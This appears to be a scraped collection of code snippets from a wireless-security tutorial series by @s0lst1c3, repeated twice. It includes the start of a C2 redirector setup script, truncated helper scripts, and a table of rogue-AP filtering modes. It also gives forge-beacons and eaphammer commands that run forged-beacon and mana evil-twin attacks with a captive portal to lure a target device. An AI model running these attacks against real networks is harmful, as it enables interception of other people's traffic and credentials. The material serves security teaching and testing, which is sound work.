Sølst1c3 s0lst1c3

## hostapd_macsec_params
Source: https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf

##### IEEE 802.1X-2004 related configuration ##################################

# Require IEEE 802.1X authorization
#ieee8021x=1

# IEEE 802.1X/EAPOL version
# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
# version 2. However, there are many client implementations that do not handle

## redir-create.sh
# Name: redir-create.sh
# Author: @s0lst1c3
# Description: Simple Bash script that creates a mod_rewrite redirector
# using Joe Vest's cs2modrewrite tool.
# Syntax: ./redir-create.sh <profile path> <teamserver url> <decoy url> <redirector ip> <ssh user> <domain>

#!/bin/bash
apache_default_ssl_conf="/etc/apache2/sites-enabled/default-ssl.conf"
apache_conf="/etc/apache2/apache2.conf"

## extract_ssids.py
import glob
all_ssids = set([])
for input_file in glob.glob('*.csv'):
    with open(input_file) as fd:
        for line in fd:
            if line.split(',')[0] == 'BSSID':
                continue
            if line.split(',')[0] == 'Station MAC':
                break
            line_len = len(line.split(','))

## build-wireshark-dev.py
#!/usr/bin/env python3
# Name:         build-wireshark-dev.py
# Author:       @s0lst1c3
# Email:        gabriel@specterops.io
# Description:  Automates the build process for Wireshark 3.1.X (dev) on Kali
# Last tested:  Nov 12 2019

import os
import shutil

## forge-beacon-bursts-4.sh
# transmit burst of 5 forged beacon packets for each entry in our whitelist to force client device to connect
./forge-beacons -i wlan1 \
 --bssid de:ad:be:ef:13:37 \
 --known-essids-file ssid-whitelist.txt \
 --dst-addr 11:22:33:11:22:33 \
 --burst-count 5

## forge-beacon-bursts-3.sh
# execute a mana attack but only respond to ESSIDs in whitelist
./eaphammer -i wlan0 \
 --bssid de:ad:be:ef:13:37 \
 --mana \
 -e bananas \
 --ssid-whitelist ssid-whitelist.txt \
 --mac-whitelist mac-whitelist.txt \
 --known-beacons \
 --captive-portal

## forge-beacon-bursts-2.sh
# create mac address whitelist containing the mac address of our target station (another spoiler)
echo '11:22:33:11:22:33' > mac-whitelist.txt

## forge-beacon-bursts-1.sh
# create an ESSID whitelist file (this is a spoiler for Part III of this series)
for ssid in "apples" "oranges" "grapes" "pears"; do
  echo $ssid >> ssid-whitelist.txt;
done

## MFACL-Table.csv

          
            MFACL Type
            MFACL Mode
            Effect

            
              MAC-based
              whitelist
              the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist

            
              MAC-based
              blacklist
              the rogue AP will ignore probe requests from specific devices making it invisible to any device not in the blacklist

            
              SSID-based
              whitelist
              the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist

            
              SSID-based
              blacklist
              the rogue AP will ignore probe requests for specific ESSIDs

## MFACL-Table.csv
MFACL Type,MFACL Mode,Effect
MAC-based,whitelist,the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist
MAC-based,blacklist,the rogue AP will ignore probe requests from specific devices, making it invisible to any device not in the blacklist
SSID-based,whitelist,the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist
SSID-based,blacklist,the rogue AP will ignore probe requests for specific ESSIDs
	Source: https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf

	##### IEEE 802.1X-2004 related configuration ##################################

	# Require IEEE 802.1X authorization
	#ieee8021x=1

	# IEEE 802.1X/EAPOL version
	# hostapd is implemented based on IEEE Std 802.1X-2004 which defines EAPOL
	# version 2. However, there are many client implementations that do not handle
	# Name: redir-create.sh
	# Author: @s0lst1c3
	# Description: Simple Bash script that creates a mod_rewrite redirector
	# using Joe Vest's cs2modrewrite tool.
	# Syntax: ./redir-create.sh <profile path> <teamserver url> <decoy url> <redirector ip> <ssh user> <domain>

	#!/bin/bash
	apache_default_ssl_conf="/etc/apache2/sites-enabled/default-ssl.conf"
	apache_conf="/etc/apache2/apache2.conf"
	import glob
	all_ssids = set([])
	for input_file in glob.glob('*.csv'):
	with open(input_file) as fd:
	for line in fd:
	if line.split(',')[0] == 'BSSID':
	continue
	if line.split(',')[0] == 'Station MAC':
	break
	line_len = len(line.split(','))
	#!/usr/bin/env python3
	# Name: build-wireshark-dev.py
	# Author: @s0lst1c3
	# Email: gabriel@specterops.io
	# Description: Automates the build process for Wireshark 3.1.X (dev) on Kali
	# Last tested: Nov 12 2019

	import os
	import shutil
	# transmit burst of 5 forged beacon packets for each entry in our whitelist to force client device to connect
	./forge-beacons -i wlan1 \
	--bssid de:ad:be:ef:13:37 \
	--known-essids-file ssid-whitelist.txt \
	--dst-addr 11:22:33:11:22:33 \
	--burst-count 5
	# execute a mana attack but only respond to ESSIDs in whitelist
	./eaphammer -i wlan0 \
	--bssid de:ad:be:ef:13:37 \
	--mana \
	-e bananas \
	--ssid-whitelist ssid-whitelist.txt \
	--mac-whitelist mac-whitelist.txt \
	--known-beacons \
	--captive-portal
	# create mac address whitelist containing the mac address of our target station (another spoiler)
	echo '11:22:33:11:22:33' > mac-whitelist.txt
	# create an ESSID whitelist file (this is a spoiler for Part III of this series)
	for ssid in "apples" "oranges" "grapes" "pears"; do
	echo $ssid >> ssid-whitelist.txt;
	done
MFACL Type	MFACL Mode	Effect
MAC-based	whitelist	the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist
MAC-based	blacklist	the rogue AP will ignore probe requests from specific devices making it invisible to any device not in the blacklist
SSID-based	whitelist	the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist
SSID-based	blacklist	the rogue AP will ignore probe requests for specific ESSIDs
	MFACL Type,MFACL Mode,Effect
	MAC-based,whitelist,the rogue AP will only respond to probe requests from specific devices making it invisble to any device not in the whitelist
	MAC-based,blacklist,the rogue AP will ignore probe requests from specific devices, making it invisible to any device not in the blacklist
	SSID-based,whitelist,the rogue AP will only respond to probe requests for specific ESSIDs making it invisible to devices whose PNLs do not intersect with the whitelist
	SSID-based,blacklist,the rogue AP will ignore probe requests for specific ESSIDs